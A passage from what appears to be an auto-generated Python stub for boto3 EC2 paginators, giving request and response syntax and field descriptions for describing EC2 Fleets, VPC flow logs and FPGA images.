'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'MaxPrice': 'string',
'SubnetId': 'string',
'AvailabilityZone': 'string',
'WeightedCapacity': 123.0,
'Priority': 123.0,
'Placement': {
'GroupName': 'string'
}
}
},
'Lifecycle': 'spot'|'on-demand',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
],
'Instances': [
{
'LaunchTemplateAndOverrides': {
'LaunchTemplateSpecification': {
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'Version': 'string'
},
'Overrides': {
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'MaxPrice': 'string',
'SubnetId': 'string',
'AvailabilityZone': 'string',
'WeightedCapacity': 123.0,
'Priority': 123.0,
'Placement': {
'GroupName': 'string'
}
}
},
'Lifecycle': 'spot'|'on-demand',
'InstanceIds': [
'string',
],
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'Platform': 'Windows'
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **Fleets** *(list) --*
Information about the EC2 Fleets.
- *(dict) --*
Describes an EC2 Fleet.
- **ActivityStatus** *(string) --*
The progress of the EC2 Fleet. If there is an error, the status is ``error`` . After all requests are placed, the status is ``pending_fulfillment`` . If the size of the EC2 Fleet is equal to or greater than its target capacity, the status is ``fulfilled`` . If the size of the EC2 Fleet is decreased, the status is ``pending_termination`` while instances are terminating.
- **CreateTime** *(datetime) --*
The creation date and time of the EC2 Fleet.
- **FleetId** *(string) --*
The ID of the EC2 Fleet.
- **FleetState** *(string) --*
The state of the EC2 Fleet.
- **ClientToken** *(string) --*
Unique, case-sensitive identifier you provide to ensure the idempotency of the request. For more information, see `Ensuring Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/Run_Instance_Idempotency.html>`__ .
Constraints: Maximum 64 ASCII characters
- **ExcessCapacityTerminationPolicy** *(string) --*
Indicates whether running instances should be terminated if the target capacity of the EC2 Fleet is decreased below the current size of the EC2 Fleet.
- **FulfilledCapacity** *(float) --*
The number of units fulfilled by this request compared to the set target capacity.
- **FulfilledOnDemandCapacity** *(float) --*
The number of units fulfilled by this request compared to the set target On-Demand capacity.
- **LaunchTemplateConfigs** *(list) --*
The launch template and overrides.
- *(dict) --*
Describes a launch template and overrides.
- **LaunchTemplateSpecification** *(dict) --*
The launch template.
- **LaunchTemplateId** *(string) --*
The ID of the launch template. You must specify either a template ID or a template name.
- **LaunchTemplateName** *(string) --*
The name of the launch template. You must specify either a template name or a template ID.
- **Version** *(string) --*
The version number of the launch template. You must specify a version number.
- **Overrides** *(list) --*
Any parameters that you specify override the same parameters in the launch template.
- *(dict) --*
Describes overrides for a launch template.
- **InstanceType** *(string) --*
The instance type.
- **MaxPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance.
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instances.
- **AvailabilityZone** *(string) --*
The Availability Zone in which to launch the instances.
- **WeightedCapacity** *(float) --*
The number of units provided by the specified instance type.
- **Priority** *(float) --*
The priority for the launch template override. If **AllocationStrategy** is set to ``prioritized`` , EC2 Fleet uses priority to determine which launch template override to use first in fulfilling On-Demand capacity. The highest priority is launched first. Valid values are whole numbers starting at ``0`` . The lower the number, the higher the priority. If no number is set, the override has the lowest priority.
- **Placement** *(dict) --*
The location where the instance launched, if applicable.
- **GroupName** *(string) --*
The name of the placement group the instance is in.
- **TargetCapacitySpecification** *(dict) --*
The number of units to request. You can choose to set the target capacity in terms of instances or a performance characteristic that is important to your application workload, such as vCPUs, memory, or I/O. If the request type is ``maintain`` , you can specify a target capacity of 0 and add capacity later.
- **TotalTargetCapacity** *(integer) --*
The number of units to request, filled using ``DefaultTargetCapacityType`` .
- **OnDemandTargetCapacity** *(integer) --*
The number of On-Demand units to request.
- **SpotTargetCapacity** *(integer) --*
The maximum number of Spot units to launch.
- **DefaultTargetCapacityType** *(string) --*
The default ``TotalTargetCapacity`` , which is either ``Spot`` or ``On-Demand`` .
- **TerminateInstancesWithExpiration** *(boolean) --*
Indicates whether running instances should be terminated when the EC2 Fleet expires.
- **Type** *(string) --*
The type of request. Indicates whether the EC2 Fleet only ``requests`` the target capacity, or also attempts to ``maintain`` it. If you request a certain target capacity, EC2 Fleet only places the required requests; it does not attempt to replenish instances if capacity is diminished, and does not submit requests in alternative capacity pools if capacity is unavailable. To maintain a certain target capacity, EC2 Fleet places the required requests to meet this target capacity. It also automatically replenishes any interrupted Spot Instances. Default: ``maintain`` .
- **ValidFrom** *(datetime) --*
The start date and time of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). The default is to start fulfilling the request immediately.
- **ValidUntil** *(datetime) --*
The end date and time of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). At this point, no new instance requests are placed or able to fulfill the request. The default end date is 7 days from the current date.
- **ReplaceUnhealthyInstances** *(boolean) --*
Indicates whether EC2 Fleet should replace unhealthy instances.
- **SpotOptions** *(dict) --*
The configuration of Spot Instances in an EC2 Fleet.
- **AllocationStrategy** *(string) --*
Indicates how to allocate the target capacity across the Spot pools specified by the Spot Fleet request. The default is ``lowest-price`` .
- **InstanceInterruptionBehavior** *(string) --*
The behavior when a Spot Instance is interrupted. The default is ``terminate`` .
- **InstancePoolsToUseCount** *(integer) --*
The number of Spot pools across which to allocate your target Spot capacity. Valid only when **AllocationStrategy** is set to ``lowestPrice`` . EC2 Fleet selects the cheapest Spot pools and evenly allocates your target Spot capacity across the number of Spot pools that you specify.
- **SingleInstanceType** *(boolean) --*
Indicates that the fleet uses a single instance type to launch all Spot Instances in the fleet.
- **SingleAvailabilityZone** *(boolean) --*
Indicates that the fleet launches all Spot Instances into a single Availability Zone.
- **MinTargetCapacity** *(integer) --*
The minimum target capacity for Spot Instances in the fleet. If the minimum target capacity is not reached, the fleet launches no instances.
- **OnDemandOptions** *(dict) --*
The allocation strategy of On-Demand Instances in an EC2 Fleet.
- **AllocationStrategy** *(string) --*
The order of the launch template overrides to use in fulfilling On-Demand capacity. If you specify ``lowest-price`` , EC2 Fleet uses price to determine the order, launching the lowest price first. If you specify ``prioritized`` , EC2 Fleet uses the priority that you assigned to each launch template override, launching the highest priority first. If you do not specify a value, EC2 Fleet defaults to ``lowest-price`` .
- **SingleInstanceType** *(boolean) --*
Indicates that the fleet uses a single instance type to launch all On-Demand Instances in the fleet.
- **SingleAvailabilityZone** *(boolean) --*
Indicates that the fleet launches all On-Demand Instances into a single Availability Zone.
- **MinTargetCapacity** *(integer) --*
The minimum target capacity for On-Demand Instances in the fleet. If the minimum target capacity is not reached, the fleet launches no instances.
- **Tags** *(list) --*
The tags for an EC2 Fleet resource.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **Errors** *(list) --*
Information about the instances that could not be launched by the fleet. Valid only when **Type** is set to ``instant`` .
- *(dict) --*
Describes the instances that could not be launched by the fleet.
- **LaunchTemplateAndOverrides** *(dict) --*
The launch templates and overrides that were used for launching the instances. Any parameters that you specify in the Overrides override the same parameters in the launch template.
- **LaunchTemplateSpecification** *(dict) --*
The launch template.
- **LaunchTemplateId** *(string) --*
The ID of the launch template. You must specify either a template ID or a template name.
- **LaunchTemplateName** *(string) --*
The name of the launch template. You must specify either a template name or a template ID.
- **Version** *(string) --*
The version number of the launch template. You must specify a version number.
- **Overrides** *(dict) --*
Any parameters that you specify override the same parameters in the launch template.
- **InstanceType** *(string) --*
The instance type.
- **MaxPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance.
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instances.
- **AvailabilityZone** *(string) --*
The Availability Zone in which to launch the instances.
- **WeightedCapacity** *(float) --*
The number of units provided by the specified instance type.
- **Priority** *(float) --*
The priority for the launch template override. If **AllocationStrategy** is set to ``prioritized`` , EC2 Fleet uses priority to determine which launch template override to use first in fulfilling On-Demand capacity. The highest priority is launched first. Valid values are whole numbers starting at ``0`` . The lower the number, the higher the priority. If no number is set, the override has the lowest priority.
- **Placement** *(dict) --*
The location where the instance launched, if applicable.
- **GroupName** *(string) --*
The name of the placement group the instance is in.
- **Lifecycle** *(string) --*
Indicates if the instance that could not be launched was a Spot Instance or On-Demand Instance.
- **ErrorCode** *(string) --*
The error code that indicates why the instance could not be launched. For more information about error codes, see `Error Codes <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/errors-overview.html.html>`__ .
- **ErrorMessage** *(string) --*
The error message that describes why the instance could not be launched. For more information about error messages, see ee `Error Codes <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/errors-overview.html.html>`__ .
- **Instances** *(list) --*
Information about the instances that were launched by the fleet. Valid only when **Type** is set to ``instant`` .
- *(dict) --*
Describes the instances that were launched by the fleet.
- **LaunchTemplateAndOverrides** *(dict) --*
The launch templates and overrides that were used for launching the instances. Any parameters that you specify in the Overrides override the same parameters in the launch template.
- **LaunchTemplateSpecification** *(dict) --*
The launch template.
- **LaunchTemplateId** *(string) --*
The ID of the launch template. You must specify either a template ID or a template name.
- **LaunchTemplateName** *(string) --*
The name of the launch template. You must specify either a template name or a template ID.
- **Version** *(string) --*
The version number of the launch template. You must specify a version number.
- **Overrides** *(dict) --*
Any parameters that you specify override the same parameters in the launch template.
- **InstanceType** *(string) --*
The instance type.
- **MaxPrice** *(string) --*
The maximum price per unit hour that you are willing to pay for a Spot Instance.
- **SubnetId** *(string) --*
The ID of the subnet in which to launch the instances.
- **AvailabilityZone** *(string) --*
The Availability Zone in which to launch the instances.
- **WeightedCapacity** *(float) --*
The number of units provided by the specified instance type.
- **Priority** *(float) --*
The priority for the launch template override. If **AllocationStrategy** is set to ``prioritized`` , EC2 Fleet uses priority to determine which launch template override to use first in fulfilling On-Demand capacity. The highest priority is launched first. Valid values are whole numbers starting at ``0`` . The lower the number, the higher the priority. If no number is set, the override has the lowest priority.
- **Placement** *(dict) --*
The location where the instance launched, if applicable.
- **GroupName** *(string) --*
The name of the placement group the instance is in.
- **Lifecycle** *(string) --*
Indicates if the instance that was launched is a Spot Instance or On-Demand Instance.
- **InstanceIds** *(list) --*
The IDs of the instances.
- *(string) --*
- **InstanceType** *(string) --*
The instance type.
- **Platform** *(string) --*
The value is ``Windows`` for Windows instances; otherwise blank.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type FleetIds: list
:param FleetIds:
The ID of the EC2 Fleets.
- *(string) --*
:type Filters: list
:param Filters:
The filters.
* ``activity-status`` - The progress of the EC2 Fleet ( ``error`` | ``pending-fulfillment`` | ``pending-termination`` | ``fulfilled`` ).
* ``excess-capacity-termination-policy`` - Indicates whether to terminate running instances if the target capacity is decreased below the current EC2 Fleet size (``true`` | ``false`` ).
* ``fleet-state`` - The state of the EC2 Fleet (``submitted`` | ``active`` | ``deleted`` | ``failed`` | ``deleted-running`` | ``deleted-terminating`` | ``modifying`` ).
* ``replace-unhealthy-instances`` - Indicates whether EC2 Fleet should replace unhealthy instances (``true`` | ``false`` ).
* ``type`` - The type of request (``instant`` | ``request`` | ``maintain`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeFlowLogs(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, FlowLogIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_flow_logs`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFlowLogs>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
FlowLogIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'FlowLogs': [
{
'CreationTime': datetime(2015, 1, 1),
'DeliverLogsErrorMessage': 'string',
'DeliverLogsPermissionArn': 'string',
'DeliverLogsStatus': 'string',
'FlowLogId': 'string',
'FlowLogStatus': 'string',
'LogGroupName': 'string',
'ResourceId': 'string',
'TrafficType': 'ACCEPT'|'REJECT'|'ALL',
'LogDestinationType': 'cloud-watch-logs'|'s3',
'LogDestination': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **FlowLogs** *(list) --*
Information about the flow logs.
- *(dict) --*
Describes a flow log.
- **CreationTime** *(datetime) --*
The date and time the flow log was created.
- **DeliverLogsErrorMessage** *(string) --*
Information about the error that occurred. ``Rate limited`` indicates that CloudWatch Logs throttling has been applied for one or more network interfaces, or that you've reached the limit on the number of log groups that you can create. ``Access error`` indicates that the IAM role associated with the flow log does not have sufficient permissions to publish to CloudWatch Logs. ``Unknown error`` indicates an internal error.
- **DeliverLogsPermissionArn** *(string) --*
The ARN of the IAM role that posts logs to CloudWatch Logs.
- **DeliverLogsStatus** *(string) --*
The status of the logs delivery (``SUCCESS`` | ``FAILED`` ).
- **FlowLogId** *(string) --*
The flow log ID.
- **FlowLogStatus** *(string) --*
The status of the flow log (``ACTIVE`` ).
- **LogGroupName** *(string) --*
The name of the flow log group.
- **ResourceId** *(string) --*
The ID of the resource on which the flow log was created.
- **TrafficType** *(string) --*
The type of traffic captured for the flow log.
- **LogDestinationType** *(string) --*
Specifies the type of destination to which the flow log data is published. Flow log data can be published to CloudWatch Logs or Amazon S3.
- **LogDestination** *(string) --*
Specifies the destination to which the flow log data is published. Flow log data can be published to an CloudWatch Logs log group or an Amazon S3 bucket. If the flow log publishes to CloudWatch Logs, this element indicates the Amazon Resource Name (ARN) of the CloudWatch Logs log group to which the data is published. If the flow log publishes to Amazon S3, this element indicates the ARN of the Amazon S3 bucket to which the data is published.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
One or more filters.
* ``deliver-log-status`` - The status of the logs delivery (``SUCCESS`` | ``FAILED`` ).
* ``log-destination-type`` - The type of destination to which the flow log publishes data. Possible destination types include ``cloud-watch-logs`` and ``S3`` .
* ``flow-log-id`` - The ID of the flow log.
* ``log-group-name`` - The name of the log group.
* ``resource-id`` - The ID of the VPC, subnet, or network interface.
* ``traffic-type`` - The type of traffic (``ACCEPT`` | ``REJECT`` | ``ALL`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type FlowLogIds: list
:param FlowLogIds:
One or more flow log IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeFpgaImages(Paginator):
def paginate(self, DryRun: bool = None, FpgaImageIds: List = None, Owners: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_fpga_images`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFpgaImages>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
FpgaImageIds=[
'string',
],
Owners=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'FpgaImages': [
{
'FpgaImageId': 'string',
'FpgaImageGlobalId': 'string',
'Name': 'string',
'Description': 'string',
'ShellVersion': 'string',
